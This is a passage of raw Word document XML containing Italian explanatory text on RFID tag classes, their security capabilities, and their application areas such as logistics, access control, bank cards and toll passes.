          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, passiamo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da dispositivi del tutto privi di logica (cioè privi di un chip che esegue i comandi del lettore ed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implementa uno schema anticollisione) e di un unico ID identificativo, a dispositivi </w:t>
      </w:r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attivi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(autoalimentati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con un trasmettitore attivo a bordo) con ampie capacità di elaborazione crittografiche capaci di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difendersi da attacchi provenienti dalla rete perché sviluppati ad hoc.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-Bold" w:hAnsi="Garamond-Bold" w:cs="Garamond-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Classe 0</w:t>
      </w:r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: Read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 - passivi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Questi sono 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più semplici in cui i dati, che consistono in un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semplice numero identificativo, vengono scritti sul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al momento della produzione dello stesso e non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è possibile aggiornare in nessun modo la memoria. Questa classe di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non possiede nessun sistema di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sicurezza intrinseco e può essere applicata nei casi in cui è necessaria la semplice identificazione univoca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dell’oggetto, integrata con un sistema informativo centralizzato. Appartengono a questa classe anche i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EAS usati nei sistemi antitaccheggio. Altri campi di’impiego per questa classe di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sono: gestione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="00787239">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6320"/>
        </w:tabs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biblioteche,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asset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, magazzini, documenti.</w:t>
      </w:r>
      <w:r w:rsidR="00787239">
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond-Bold" w:hAnsi="Garamond-Bold" w:cs="Garamond-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Classe 1</w:t>
      </w:r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: Write Once Read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Many</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 (WORM) - passivi. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In questo caso il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viene prodotto senza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scrivere nessun dato nella memoria. I dati possono essere scritti dal produttore del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o dall’utilizzatore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una sola volta, non è possibile nessuna scrittura successiva: a questo punto il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può essere solo letto.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Si tratta di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su cui può essere memorizzato solo un identificativo (fino a 256 bit) definito dall’utente.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Come nel caso precedente il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non possiede capacità di elaborazione tali da implementare sistemi di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sicurezza come crittografia autenticazione ecc.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-Bold" w:hAnsi="Garamond-Bold" w:cs="Garamond-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Classe 2</w:t>
      </w:r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: Read Write - passivi. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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di questa classe, hanno la memoria utente riscrivibile (con un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ciclo di vita dell’ordine delle 100000 scritture), che può arrivare intorno ai 2 kb oltre ad avere un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identificativo impresso durante la fabbricazione. Dal punto di vista della sicurezza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anlcuni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appartenenti a questa classe, implementano sistemi per bloccare la scrittura non autorizzata della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memoria utente. Nel caso dei dispositivi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Mifare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(ISO 14443A) la comunicazione con il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reader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(con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distanze sempre nell’ordine di 10-15cm) prevede sistemi di crittografia e autenticazione, cosa che in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generale i dispositivi di tipo passivo e a basso costo, come gli ISO 15693, non implementano.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di classe 2 vengono spesso impiegati nei settori dove è utile avere dei </w:t>
      </w:r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data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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direttamente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sull’oggetto (Supply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chain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impianti di produzione, ambito sanitario). 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-Bold" w:hAnsi="Garamond-Bold" w:cs="Garamond-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Classe 3</w:t>
      </w:r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: Read Write - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>semipassivi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> con sensore a bordo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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appartenenti a questa classe sono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equipaggiati con un sensore che consente di registrare, nella memoria utente, parametri quali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temperatura, pressione, umidità, e spostamenti. Questi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devono necessariamente avere una sorgente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interna di energia poiché le letture devono poter essere effettuate dal sensore in assenza del lettore. Nei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dispositivi semipassivi comunque la comunicazione con il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reader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avviene, come nei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completamente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passivi, utilizzando l’energia del campo generato dal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reader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-Bold" w:hAnsi="Garamond-Bold" w:cs="Garamond-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Classe 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond-Italic" w:hAnsi="Garamond-Italic" w:cs="Garamond-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Read Write - attivi con trasmettitore integrato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Questi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sono come dei dispositivi radio in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miniatura che possono comunicare con altri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o altri dispositivi in assenza del lettore. Ciò significa che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presi in esame sono completamente attivi e quindi alimentati dalla propria batteria. L’uso di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tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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attivi o semi-attivi, dotati cioè di una propria alimentazione e di memoria, consente l’utilizzo della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crittografia, sia asimmetrica che simmetrica, quindi di una autenticazione “forte”. La possibilità di scelta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC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di un tipo di elaborazione per la sicurezza non è realizzabile su dispositivi a basso costo, in quanto la</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC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Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fonte di energia a bordo diviene indispensabile per l’impiego di un motore di crittografia.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="00787239" w:rsidRDefault="002D60FC" w:rsidP="00A4657F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="00496616" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Applicazioni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>La tecnologia RFID è considerata per la sua potenzialità di applicazione una</w:t>
      </w:r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hyperlink r:id="rId8" w:tooltip="Tecnologia" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>tecnologia</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId9" w:tooltip="General purpose" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">general </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>purpose</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">(come l'elettricità, la ruota, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) e presenta un elevato livello di</w:t>
      </w:r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r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>pervasività</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:spacing w:before="96" w:after="120" w:line="360" w:lineRule="atLeast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>Diversi i campi di applicazione della tecnologia. In particolare i campi di adozione principali esistenti sono:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Le soluzioni su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 125/134 kHz trovano campi applicativi: tracciabilità animali domestici e di allevamento(cani, mucche, ...), apertura serrature (settore alberghiero e controllo accessi)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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Le soluzioni su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 13,56 MHz trovano applicazioni in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="72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>standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="ISO 15693" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>ISO 15693</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r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per la tracciabilità (alimentare, prodotti, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>), borsellini elettronici non bancari (villaggi vacanze,</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tooltip="Discoteca" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>discoteche</w:t>
        </w:r>
      </w:hyperlink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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="72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>standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="ISO 14443" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>ISO 14443</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(ad alta sicurezza) per carte bancarie, tessere documenti di identità elettronici,</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tooltip="Titolo di viaggio elettronico" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>titoli di viaggio elettronici</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="36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le soluzioni con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 UHF</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="ISO 18000 (pagina inesistente)" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="CC2200"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>ISO 18000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>sono dedicate alla</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tooltip="Logistica" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>logistica</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>sia interna che esterna d'azienda</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr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le soluzioni con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2,4 GHz e oltre per la mobilità (</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tooltip="Telepass" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>telepass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>e similari) e gli</w:t>
      </w:r>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tooltip="Interporto" w:history="1">
        <w:r w:rsidRPr="002D60FC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>interporti</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRPr="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:after="72" w:line="190" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D232F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Passaporto </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
